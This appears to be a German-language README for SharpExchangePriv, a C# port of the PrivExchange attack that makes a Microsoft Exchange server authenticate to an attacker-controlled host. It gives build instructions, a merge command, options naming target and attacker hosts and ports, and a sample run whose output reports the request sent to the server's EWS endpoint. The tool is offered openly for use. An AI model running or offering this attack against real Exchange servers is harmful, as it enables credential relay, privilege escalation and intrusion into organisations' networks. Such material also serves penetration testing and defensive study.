
Eine C#-Implementierung von PrivExchange von @_dirkjan.
Eine C#-Implementierung von PrivExchange von @_dirkjan. Dank an @g0ldenGunSec, da ich auf seinen Code zurückgegriffen habe.
Es wurde gegen Exchange 2016 getestet.
SharpExchangePriv wurde für .NET 3.5 erstellt und ist mit Visual Studio 2017 kompatibel. Öffnen Sie einfach die Projektmappendatei und erstellen Sie das Projekt.
Ich habe CommandLineParser verwendet, um die Argumente zu parsen. Dadurch werden die CommandLine.dll-Datei zusammen mit der ausführbaren Datei erstellt. Sie können die .exe und die .dll einfach zu einer einzigen ausführbaren Datei zusammenführen:
ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll
--targetHostLegen Sie die IP des Zielhosts fest.
--attackerHostLegen Sie die IP des Angreifers fest.
--attackerPortLegen Sie den Port des Angreifers fest.
--attackerPageLegen Sie die Seite des Angreifers fest.
--sslSSL aktivieren.
--exchangeVersionLegen Sie die Exchange-Version fest, Standard ist 2016.
--exchangePortLegen Sie den Zielport für Exchange fest.
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
/$$$$$$$ /$$ /$$$$$$$$ /$$
| $$__ $$ |__/ | $$_____/ | $$
| $$ \ $$ /$$$$$$ /$$ /$$ /$$| $$ /$$ /$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$
| $$$$$$$//$$__ $$| $$| $$ /$$/| $$$$$ | $$ /$$/ /$$_____/| $$__ $$ |____ $$| $$__ $$ /$$__ $$ /$$__ $$
| $$____ /| $$ \__ /| $$ \ $$/$$/ | $$__ / \ $$$$/ | $$ | $$ \ $$ /$$$$$$$| $$ \ $$| $$ \ $$| $$$$$$$$
| $$ | $$ | $$ \ $$$/ | $$ >$$ $$ | $$ | $$ | $$ /$$__ $$| $$ | $$| $$ | $$| $$_____ /
| $$ | $$ | $$ \ $/ | $$$$$$$$ /$$/\ $$| $$$$$$$| $$ | $$| $$$$$$$| $$ | $$| $$$$$$$| $$$$$$$
|__/ |__/ |__/ \_/ |________/|__/ \__/ \_______/|__/ |__/ \_______/|__/ |__/ \____ $$ \_______/
/$$ \ $$
| $$$$$$/
\______ /
@den_n1s
The target URL is https://192.168.11.10:443/EWS/Exchange.asmx
Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx
HTTP 200 response received, the target Exchange server should be authenticating shortly.
Bitte melden Sie Fehler auf der Github-Projektseite oder kontaktieren Sie mich auf Twitter @den_n1s.